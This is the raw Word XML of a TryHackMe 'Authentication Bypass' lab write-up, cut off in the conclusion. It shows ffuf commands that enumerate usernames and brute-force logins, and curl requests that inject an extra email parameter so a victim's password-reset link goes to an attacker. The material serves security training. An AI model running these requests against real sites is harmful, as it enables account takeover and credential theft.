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10CC2" w14:textId="311F891F" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="00395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B378F1" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="003954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54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TryHackMe: Authentication Bypass — Technical Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C33A92A" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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411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14:paraId="24ED9497" w14:textId="77777777" w:rsidR="00395411" w:rsidRP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 xml:space="preserve">This report documents the methodology and results of completing the </w:t>
      </w:r>
      <w:r w:rsidRPr="00395411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Authentication Bypass</w:t>
      </w:r>
      <w:r w:rsidRPr="00395411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> lab on TryHackMe. The exercise focuses on identifying weak authentication mechanisms, enumerating valid usernames, performing credential-stuffing attacks, and exploiting flawed password-reset logic to gain unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496A20A6" w14:textId="77777777" w:rsidR="00395411" w:rsidRP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>The goal: demonstrate systematic offensive security methodology suitable for a junior penetration tester or cybersecurity analyst role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07735833" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="00395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pict w14:anchorId="554521B8">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0B5279" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>1. Username Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2067E3C5" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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411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C99C120" w14:textId="77777777" w:rsidR="00395411" w:rsidRP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>Determine which usernames already exist in the application by abusing the signup page’s error messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4192CA2F" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37633395" w14:textId="77777777" w:rsidR="00395411" w:rsidRP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>Navigated to the target application’s signup endpoint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BEB20B" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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http://10.201.79.189/customers/signup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C144CE" w14:textId="77777777" w:rsidR="00395411" w:rsidRP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 xml:space="preserve">Submitting various usernames reveals a message indicating whether the account already exists. This allowed automated enumeration using </w:t>
      </w:r>
      <w:r w:rsidRPr="00395411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ffuf</w:t>
      </w:r>
      <w:r w:rsidRPr="003954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7999EF" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E132C7B" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209E4F8A" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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-X POST \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745E2756" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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-d "username=FUZZ&amp;email=x&amp;password=x&amp;cpassword=x" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B181603" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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-H "Content-Type: application/x-www-form-urlencoded" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46115006" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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-u http://10.201.79.189/customers/signup \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2137D557" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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-mr "username already exists"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7600384E" w14:textId="77777777" w:rsidR="00395411" w:rsidRP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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Key parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017CF00A" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="003954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lastRenderedPageBreak/>
        <w:t>-w</w:t>
      </w:r>
      <w:r w:rsidRPr="00395411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – wordlist containing candidate usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31117218" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="003954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-X POST</w:t>
      </w:r>
      <w:r w:rsidRPr="00395411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – specifies the HTTP method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0552E0FC" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="003954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-d</w:t>
      </w:r>
      <w:r w:rsidRPr="00395411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – POST data; </w:t>
      </w:r>
      <w:r w:rsidRPr="00395411">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FUZZ</w:t>
      </w:r>
      <w:r w:rsidRPr="00395411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> marks insertion points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578DCF7E" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="003954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-H</w:t>
      </w:r>
      <w:r w:rsidRPr="00395411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – sets content-type for form submission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765DEFD9" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="003954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-mr</w:t>
      </w:r>
      <w:r w:rsidRPr="00395411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – match response text indicating a valid/registered username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC73C8A" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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411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14:paraId="526A3267" w14:textId="77777777" w:rsid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>The scan successfully enumerated several valid user accounts, including three additional usernames not visible from the front-end interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203DE52F" w14:textId="018E0D13" w:rsidR="00395411" w:rsidRP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9852F1" wp14:editId="6D4D80CD">
            <wp:extent cx="4572000" cy="2807161"/>
            <wp:effectExtent l="0" t="0" r="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0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8311" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="00395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pict w14:anchorId="582B804F">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DD015D" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>2. Credential Bruteforcing with Valid Usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208A0CA0" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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411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B1326AC" w14:textId="77777777" w:rsidR="00395411" w:rsidRP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>Using the discovered usernames, perform a targeted password attack against the login endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BF7870" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447C4684" w14:textId="77777777" w:rsidR="00395411" w:rsidRP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>A second ffuf operation was run using two wordlists:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAA0A05" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="003954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>Known valid usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4F5A61" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="003954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>Top 100 common passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4AF8C1" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6635E2D2" w14:textId="2EE7ABED" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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lastRenderedPageBreak/>
        <w:t>ffuf -w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95411">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4B82E8" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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-X POST \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E9D859" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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-d "username=W1&amp;password=W2" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211D8E8C" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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-H "Content-Type: application/x-www-form-urlencoded" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F25DE4" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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-u http://10.201.79.189/customers/login \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E089CD0" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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-fc 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B74BF1C" w14:textId="4B324AE5" w:rsidR="00395411" w:rsidRP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Key parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="0039541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8D4966C" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="00395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W1</w:t>
      </w:r>
      <w:r w:rsidRPr="0039541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95411">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>W2</w:t>
      </w:r>
      <w:r w:rsidRPr="00395411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> define custom fuzz keywords for multi-wordlist attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9B93D1" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="003954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-fc 200</w:t>
      </w:r>
      <w:r w:rsidRPr="00395411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> filters out normal (failed) login responses by excluding HTTP 200; any different status likely indicates successful authentication or a redirect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01825FAB" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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411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14:paraId="019CD314" w14:textId="77777777" w:rsidR="00395411" w:rsidRP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>A valid credential pair was recovered:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785A6355" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="003954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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Username:</w:t>
      </w:r>
      <w:r w:rsidRPr="003954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5411">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>steve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA19AA4" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="003954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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Password:</w:t>
      </w:r>
      <w:r w:rsidRPr="003954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5411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(Recovered via attack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B66051" w14:textId="77777777" w:rsid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>This confirmed weak password hygiene and lack of account lockout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B1471C" w14:textId="2601DFB4" w:rsidR="00395411" w:rsidRP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0EFD0C3" wp14:editId="6720A842">
            <wp:extent cx="4572000" cy="3202134"/>
            <wp:effectExtent l="0" t="0" r="0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DBFD" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="00395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pict w14:anchorId="17E64931">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="14996D94" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>3. Password Reset Token Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0D731F" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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4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Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68065A7B" w14:textId="77777777" w:rsidR="00395411" w:rsidRP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>Investigate whether the password reset workflow leaks sensitive data or can be manipulated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CA01F0" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB94B8D" w14:textId="77777777" w:rsid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 xml:space="preserve">Issued a crafted password-reset request using </w:t>
      </w:r>
      <w:r w:rsidRPr="00395411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r w:rsidRPr="00395411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to inspect backend behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0397BC" w14:textId="68BC75A2" w:rsidR="00FA4875" w:rsidRPr="00395411" w:rsidRDefault="00FA4875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08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45942143" w14:textId="024D6612" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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C</w:t>
      </w:r>
      <w:r w:rsidRPr="00395411">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>url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95411">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'http://10.201.79.189/customers/reset?email=robert%40acmeitsupport.thm' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECCD44A" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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-H 'Content-Type: application/x-www-form-urlencoded' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F909A0" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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-d 'username=robert'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F32ACC" w14:textId="18074007" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00FA4875" w:rsidP="0039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14:paraId="49BDAEB3" w14:textId="77777777" w:rsid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>The server responded with verbose output revealing internal reset-token data, confirming insufficient access control and input sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE3E87C" w14:textId="2E5AD4A2" w:rsidR="00395411" w:rsidRP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D9C20CB" wp14:editId="68E77A68">
            <wp:extent cx="4572000" cy="2984938"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Picture 3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screen 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8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D3A9" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="00395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pict w14:anchorId="7892A541">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3BAA93" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>4. Hijacking the Password Reset Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0B9B5F" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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411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75480C6" w14:textId="77777777" w:rsidR="00395411" w:rsidRP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>Exploit the password-reset workflow to redirect reset tickets to an attacker-controlled email address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDD1009" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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4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Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBCF685" w14:textId="77777777" w:rsid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>A modified POST request injected an alternative email parameter, effectively overwriting the legitimate recipient for password-reset notifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2496CA82" w14:textId="6DE9D1A6" w:rsidR="00A91508" w:rsidRPr="00395411" w:rsidRDefault="00A91508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08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424A3092" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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curl 'http://10.201.79.189/customers/reset?email=robert%40acmeitsupport.thm' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33362C3A" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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-H 'Content-Type: application/x-www-form-urlencoded' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404B8915" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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-d 'username=robert&amp;email=attacker@hacker.com'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD6C691" w14:textId="77777777" w:rsidR="00395411" w:rsidRP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>Next, an attacker account was created on the same system to receive the redirected support ticket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468C7DA5" w14:textId="77777777" w:rsidR="00395411" w:rsidRP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>A follow-up reset request substituted the attacker’s mailbox:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BCFC09" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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curl 'http://10.201.79.189/customers/reset?email=robert@acmeitsupport.thm' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1D979E" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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-H 'Content-Type: application/x-www-form-urlencoded' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694E8AFF" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="0039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-d 'username=robert&amp;email={new_account_email}@customer.acmeitsupport.thm'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0537498F" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="00395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411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14:paraId="350D9C29" w14:textId="77777777" w:rsidR="00395411" w:rsidRP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>The attacker-controlled account received a support ticket containing a full password-reset link.</w:t>
      </w:r>
      <w:r w:rsidRPr="00395411">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662CA6FC" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="00395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411">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http://10.201.79.189/customers/reset/11c0ee3c666531226637140f56a8d8d2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0F066F" w14:textId="77777777" w:rsid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>Using this link, the attacker can reset the victim’s password and gain direct access to the account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303B047F" w14:textId="63283801" w:rsidR="00395411" w:rsidRP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8F95D3A" wp14:editId="7E52FF5E">
            <wp:extent cx="4572000" cy="3122811"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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B7F4" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="00395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CDAA141">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7BC723" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="00395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411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0D9345BC" w14:textId="77777777" w:rsidR="00395411" w:rsidRP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>This TryHackMe lab demonstrated a complete compromise of an authentication system through:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E703BA" w14:textId="77777777" w:rsidR="00395411" w:rsidRPr="00395411" w:rsidRDefault="00395411" w:rsidP="003954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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
